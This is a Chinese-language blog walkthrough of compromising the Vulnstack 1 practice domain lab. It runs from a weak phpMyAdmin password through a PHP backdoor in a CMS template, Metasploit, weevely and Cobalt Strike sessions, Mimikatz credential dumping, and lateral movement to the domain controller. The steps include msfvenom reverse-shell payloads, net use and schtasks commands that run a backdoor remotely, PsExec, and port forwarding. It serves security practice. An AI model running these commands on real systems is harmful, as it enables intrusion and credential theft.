Vulnstack內網靶場1
最近發現了一個內網的靶場網站,簡單配置一下網路就可以,不用自己搭建這麼麻煩漏洞資訊 (qiyuanxuetang.net)
環境配置
內網1靶場由三臺機器構成:WIN7、2008 server、2003 server
其中WIN7做為對外的web機,2008作為域控
WIN7新增一個網絡卡,一個設為僅主機,一個設為NET
2003、2008 設為僅主機
初始密碼hongrisec@2019
資訊收集
深入探測
80埠和3306埠 ,檢視80埠
一個phpstudy的探針介面,一般來說後臺登陸介面就是phpmyadmin,掃了之後果然
直接弱口令root root嘗試登陸,直接登陸上了後臺
注意到裡面有個叫newxycms的資料庫,說明肯定還有其他網站,嘗試了yx,newyxcms,yxcms得到子域名yxcms
一個小提示
進入後臺之後,注意到了一個上傳檔案管理,但是我沒有找到上傳檔案的地方
然後看到了前臺模板這邊,發現可以更改php檔案,將原來的php檔案裡的東西都刪了,寫入msf生成的木馬,或者建立一個新的php程式碼寫入msf程式碼(真實情況下還是建立好,後期清理痕跡的時候方便)
但是改了之後發現一個問題,不知道這個檔案的路徑是什麼,查了wp發現原來掃描的時候掃出來了一個rar網站備份檔案,後來我換了一個字典掃也掃出來了,看來以後掃描資訊洩露啥的還得換字典多掃幾次。
得到了備份檔案,知道了檔案的絕對路徑,那就可以連線木馬getshell了
GetShell
剛剛寫入了msf的木馬,使用msf連線木馬
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lHOST 192.168.200.6
run
訪問檔案路徑
但是這個shell效果不太好,輸入了shell之後就卡住瞭然後自動斷開了連線
然後查看了一下網上的,都是用蟻劍連線,沒有人用msf,然後我就試了試weevely生成後門,然後寫上去後連線
weevely generate test test.php //生成後門 weevely http://192.168.200.27/yxcms/protected/apps/default/view/default/door.php test //連線
然後使用cs連線weevely生成的shell
然後再使用cs反彈shell給msf Cobalt Strike - 1_Ry - 部落格園 (cnblogs.com)
getsystem提權
程序遷移,將shell遷移到穩定的程序中
內網資訊收集
GOD域
輸入shell進入系統,ipconfig檢視網路,發現內網的ip,可以探測網段確定內網主機ip
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="
共三臺主機,其中143是已經被拿下的win7
由於msf收集到很多資訊是亂碼,後續我用cs繼續進行收集
在資訊收集的時候會顯示RPC錯誤,是DNS解析問題,解決方法在win7 hosts檔案新增owa.god.org
確定域主機名,這裡應該還有一個叫STU1的本機名,不知道為什麼沒顯示出來
確定域控名
確定主機名對應的ip地址(第二個ip地址是錯的,但是排除法可以得到IP地址)
檢視使用者
拿到使用者和ip地址之後,嘗試抓取密碼
這裡可以通過msf中的mimikatz或者cs中的mimikatz抓取密碼,比較幸運直接抓取到了明文密碼
域內橫向移動
接下來參考我之前學習的域橫向知識,可以先建立ipc$連線,然後上傳後門執行,也可以使用pstoos工具包中的PsExec。第一次進行域橫向的實戰,就每種方法都試一試
ipc連線
建立ipc連線
net use \\192.168.52.138\ipc$ "Admin111" /user:Administrator
net use 檢視連線
使用cs生成一個windows後門,接著將後門上傳至win7
接著通過win7將後門檔案上傳至域控主機上
shell copy c:\1.exe \\192.168.52.138\c$
確定目標主機時間
使用at或者schtasks建立定時任務執行後門
at \\
192.168
.52
.138 11:49
C:\1.exe
schtasks /create /s 192.168.52.138 /tn test /sc once /st 11:49 /tr C:\1.exe
/ru system /f
這裡糊塗了,突然發現內網的機器不能直接連上攻擊機,需要通過win7作為跳板
PsExec
pstools工具包中的psexec
msf上傳
upload /root/PSTools/PsExec.exe C:/psexec.exe
PsExec.exe -accepteula -s \\192.168.52.138 cmd.exe
但是這樣還是無法連線遠端主機,可能因為還是因為攻擊機是外網,後來想到一個辦法,建立一個.bat檔案,上傳到win7,再執行試試看,但還是不行
路由,埠轉發
獲取目標機內網地址網段
run get_local_subnets
通過background
回到msf
,使用route
增加對應路由,4是sessions值
route add 192.168.52.0 255.255.255.0 4
檢視是否設定成功
這樣msf就能掃描到內網的主機了
但是設定之後我使用了msf內建的psexec也還是無法攻擊成功,這就不知道怎麼回事了
埠轉發
埠轉發可以讓攻擊機訪問本來無法直接訪問的目標主機。portfwd可以反彈單個埠到本地並且監聽。
在meterpreter會話輸入
portfwd add -l 3389 -r 192.168.200.27 -p 3389
-l 本地監聽埠
-r 遠端地址
-p 遠端埠
3389圖形操作
在meterpreter會話開啟3389埠
run getgui -erun post
/windows/manage/enable_rdp
遠端桌面連線
rdesktop 192.168.200.27:3389
這裡應該要建立一個新的使用者,不然直接登陸的話會擠掉別人的賬戶
這裡直接執行剛剛不能成功的方法,直接獲取到域控system許可權
接下來嘗試反彈shell到kali
首先上傳powercat
copy c:\powercat.ps1 \\192.168.52.138\c$
匯入powercat需要設定執行策略
但是又失敗了,只要執行powershell那個域控的shell就會卡死,根本沒法反彈
只能試一下lcx埠轉發
重新制作一個木馬,ip設定為win7的ip
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.143 LPORT=11111 -f exe > shell.exe
上傳到域控,開啟監聽
lcx -slave 192.168.200.6 4555 192.168.52.143 11111
執行木馬,也不行,放棄了 。。
cs中的psexec
首先進行網段的掃描,確定存活主機
這裡需要建立SMB監聽
之前已經使用mimikatz獲取了密碼,所以本地有儲存,選擇SMB監聽器,選擇會話
成功上線
接下來拿域控也是同樣的方法
總結
這個內網靶機難度較低,滲透win7很容易,主要是內網部分,雖然說也不是很難,明文密碼都能直接獲取,但是第一次實戰內網,還是遇到了許多困難,思路有點亂,內網資訊收集的時候會不知道收集什麼,需要反覆查閱筆記,收集完資訊之後也不知道怎麼域橫向了,也是檢視筆記才想起來,而且域橫向的方法還有特別多,還是需要多多實戰。還有上傳後門的時候把目標主機搞得一團糟,這就造成了後期清理痕跡帶來了很大的工作量,而且在實戰環境下也更加容易被發現。但還是收穫了很多